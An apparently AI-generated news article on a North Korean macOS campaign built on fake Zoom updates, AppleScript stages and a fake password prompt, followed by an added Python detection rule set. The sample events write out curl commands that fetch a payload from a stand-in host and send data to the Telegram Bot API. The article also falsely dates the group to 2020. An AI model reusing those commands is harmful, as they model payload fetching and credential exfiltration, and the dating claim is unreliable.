Ethical Hacking News
North Korea's Lazarus Group has launched a new campaign targeting macOS users using a combination of social engineering and fake software updates. The attackers are using a sophisticated attack chain that leverages legitimate Apple tools and mimics Apple naming conventions to disguise their illicit activity. By understanding the tactics used by this group, individuals can take necessary precautions to protect themselves from such attacks.
Summary: North Korea's Lazarus Group has launched a new campaign targeting macOS users using social engineering and fake software updates. The attackers use a sophisticated attack chain that leverages legitimate Apple tools and mimics Apple naming conventions to disguise their illicit activity.
The Lazarus Group (Sapphire Sleet) is targeting macOS users with a combination of social engineering and fake Zoom software updates. The attackers create fake recruiter profiles on social media to trick finance professionals into manually running malware. The attack uses a fake Zoom support meeting invite to download a malicious payload that launches a trusted Apple-signed process. The payload fetches and executes progressively more complex AppleScript payloads, using distinct user-agent strings for campaign tracking. The attackers use native Apple tools and naming conventions to disguise the illicit activity and obtain valid user credentials via a malicious application called systemupdate.app. Social engineering is an attractive tactic for attackers because it is low-cost, hard to patch, and scales well.
North Korea's Lazarus Group, also known as Sapphire Sleet (APT38), has been making waves in the cyber security community with its latest campaign targeting macOS users. According to Microsoft, the group is using a combination of social engineering and a fake Zoom software update to trick people into manually running malware on their own computers.
The attacks begin with social engineering, where the crew creates fake recruiter profiles on social media and networking platforms like LinkedIn, and then reaches out to finance professionals with phony job opportunities. Once the victim has expressed interest, they are scheduled for a technical interview, which serves as the delivery mechanism for the malware.
But what makes this attack stand out is its use of a fake Zoom software update. The attackers send victims a fake Zoom support meeting invite, instructing them to download a file called Zoom SDK Update.scpt. This compiled AppleScript looks like a legitimate Zoom SDK update, complete with a large comment block of update instructions to make it appear authentic.
However, beneath the decoy content lies a malicious payload that invokes the legitimate macOS softwareupdate binary with an invalid parameter. The call accomplishes nothing on its own, but it launches a trusted Apple-signed process so that the "update" looks legitimate to the victim.
Next, the script executes its malicious payload via curl to fetch a new attacker-controlled AppleScript that launches directly within the Script Editor context and ensures that additional payloads are dynamically downloaded and executed.
The entire attack unfolds through a cascading chain of curl commands, each fetching and executing progressively more complex AppleScript payloads. Each stage uses a distinct user-agent string as a campaign tracking identifier.
Each stage of the campaign also abuses native Apple tools or mimics Apple naming conventions to disguise the illicit activity. For example, the host monitoring binary is called com.apple.cli, which helps mask the 5 MB Mach-O executable with an Apple-style naming convention.
The credential stealer, delivered through an AppleScript payload executed via osascript, drops a malicious macOS application named systemupdate.app that masquerades as a software update utility. When launched, this application displays a native macOS password dialog that closely resembles a legitimate system prompt, prompting the user to enter their password "to complete a software update."
This allows Sapphire Sleet to obtain valid user credentials, exfiltrating them by using the Telegram Bot API.
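Seen from the defender's side, the chain described above leaves several process-level signals: a script host (Script Editor or osascript) launching softwareupdate and curl, a softwareupdate call with an argument the tool does not recognise, an Apple-named binary living outside Apple's own directories, an update-themed app bundle in a user-writable location, and egress to the Telegram Bot API from a command-line tool. The following Python is an added example, not code from the article or from Microsoft: a small rule set run over constructed process events in the shape an EDR or Endpoint Security collector might record. The event fields, rule names, the partial softwareupdate switch allowlist, the Apple path prefixes and the sample records are all assumptions made for illustration; api.telegram.org is the public Bot API host.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-start record (assumed schema, modelled on typical EDR telemetry)."""
    pid: int
    name: str            # executable basename
    path: str            # full on-disk path of the executable
    cmdline: str         # argv joined with spaces
    parent_name: str     # basename of the parent process
    dest_host: str = ""  # remote host if the record also carries a network connection


# Script hosts the article names as the execution context for the AppleScript stages.
SCRIPT_HOSTS = {"osascript", "Script Editor"}

# Where genuine Apple-named binaries live (assumption: partial list for illustration).
APPLE_PATH_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/", "/Library/Apple/")

# Partial, hand-maintained allowlist of real softwareupdate switches (not exhaustive).
SOFTWAREUPDATE_FLAGS = {
    "-l", "--list", "-d", "--download", "-i", "--install", "-a", "--all",
    "-r", "--recommended", "--background", "--history", "--verbose",
    "--no-scan", "--agree-to-license",
}

# Public Telegram Bot API host; assumption: no legitimate workstation process on a
# finance user's Mac should be talking to it.
TELEGRAM_BOT_API_HOST = "api.telegram.org"

UPDATE_LOOKALIKE_BUNDLE = re.compile(r"(?i)system\s*update\.app/")


def curl_spawned_by_script_host(e: ProcEvent) -> bool:
    return e.name == "curl" and e.parent_name in SCRIPT_HOSTS


def softwareupdate_spawned_by_script_host(e: ProcEvent) -> bool:
    return e.name == "softwareupdate" and e.parent_name in SCRIPT_HOSTS


def softwareupdate_unrecognised_argument(e: ProcEvent) -> bool:
    # Only dash-prefixed tokens are checked; bare tokens are package labels for -i.
    if e.name != "softwareupdate":
        return False
    args = e.cmdline.split()[1:]
    return any(a.startswith("-") and a not in SOFTWAREUPDATE_FLAGS for a in args)


def apple_named_binary_outside_apple_paths(e: ProcEvent) -> bool:
    return e.name.startswith("com.apple.") and not e.path.startswith(APPLE_PATH_PREFIXES)


def update_lookalike_app_bundle(e: ProcEvent) -> bool:
    return UPDATE_LOOKALIKE_BUNDLE.search(e.path) is not None


def telegram_bot_api_egress(e: ProcEvent) -> bool:
    return e.dest_host == TELEGRAM_BOT_API_HOST


RULES = [
    curl_spawned_by_script_host,
    softwareupdate_spawned_by_script_host,
    softwareupdate_unrecognised_argument,
    apple_named_binary_outside_apple_paths,
    update_lookalike_app_bundle,
    telegram_bot_api_egress,
]


def evaluate(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Return {pid: sorted rule names} for events that trip at least one rule."""
    hits: dict[int, list[str]] = {}
    for e in events:
        fired = sorted(r.__name__ for r in RULES if r(e))
        if fired:
            hits[e.pid] = fired
    return hits


# Constructed sample telemetry: pids 1xx mimic the chain in the article, 2xx are benign.
SAMPLE_EVENTS = [
    ProcEvent(101, "softwareupdate", "/usr/sbin/softwareupdate",
              "softwareupdate --bogus-flag", "Script Editor"),
    ProcEvent(102, "curl", "/usr/bin/curl",
              "curl -A stage2-tracker https://example.invalid/next.scpt", "Script Editor"),
    ProcEvent(103, "com.apple.cli", "/Users/alice/Library/Caches/com.apple.cli",
              "com.apple.cli", "osascript"),
    ProcEvent(104, "systemupdate",
              "/Users/alice/Downloads/systemupdate.app/Contents/MacOS/systemupdate",
              "systemupdate", "osascript"),
    ProcEvent(105, "curl", "/usr/bin/curl",
              "curl -s https://api.telegram.org/bot<placeholder>/sendMessage", "osascript",
              dest_host="api.telegram.org"),
    ProcEvent(201, "softwareupdate", "/usr/sbin/softwareupdate", "softwareupdate -l", "zsh"),
    ProcEvent(202, "curl", "/usr/bin/curl", "curl https://example.com/", "zsh",
              dest_host="example.com"),
    ProcEvent(203, "com.apple.geod", "/System/Library/PrivateFrameworks/GeoServices.framework/"
              "Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod",
              "com.apple.geod", "launchd"),
]

if __name__ == "__main__":
    for pid, rules in evaluate(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

None of these rules is conclusive alone (a developer may well run curl from osascript), which is why the output is grouped per process: two or more rules firing on the same short-lived chain of script host, softwareupdate and curl is what an analyst would escalate, while a lone `softwareupdate -l` from a shell stays silent.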
In a statement, Sherrod DeGrippo, Microsoft global threat intelligence GM, explained that social engineering is an attractive tactic for attackers. "It's low-cost, hard to patch, and scales well," she said. "Users are conditioned to accept remote support interactions like downloading tools, following instructions, clicking prompts. Attackers exploit this familiarity to make malicious actions feel routine, lowering victim skepticism at the critical moment of compromise."
The Lazarus Group has been in business since at least 2020, primarily targeting the finance sector to steal cryptocurrency wallets and intellectual property related to cryptocurrency trading and blockchain platforms.
This latest campaign highlights the sophistication and creativity of North Korean cyber threats. As the threat landscape continues to evolve, it's essential for users to remain vigilant and take necessary precautions to protect themselves from such attacks.
In conclusion, the Lazarus Group's use of social engineering and fake software updates to target macOS users serves as a stark reminder of the evolving nature of cyber threats. By understanding these tactics and taking proactive measures to secure their devices, individuals can significantly reduce the risk of falling victim to such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/North-Koreas-Lazarus-Group-The-Sophisticated-Cyber-Threat-to-macOS-Users-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/04/16/north_korea_social_engineering_macos/
https://www.theregister.com/2026/04/16/north_korea_social_engineering_macos/
https://www.microsoft.com/en-us/security/blog/2026/04/16/dissecting-sapphire-sleets-macos-intrusion-from-lure-to-compromise/
https://www.picussecurity.com/resource/blog/lazarus-group-apt38-explained-timeline-ttps-and-major-attacks
https://attack.mitre.org/groups/G0082/
https://cybersecuritynews.com/lazarus-group-is-no-longer-consider-a-single-apt-group/
Published: Thu Apr 16 14:50:15 2026 by llama3.2 3B Q4_K_M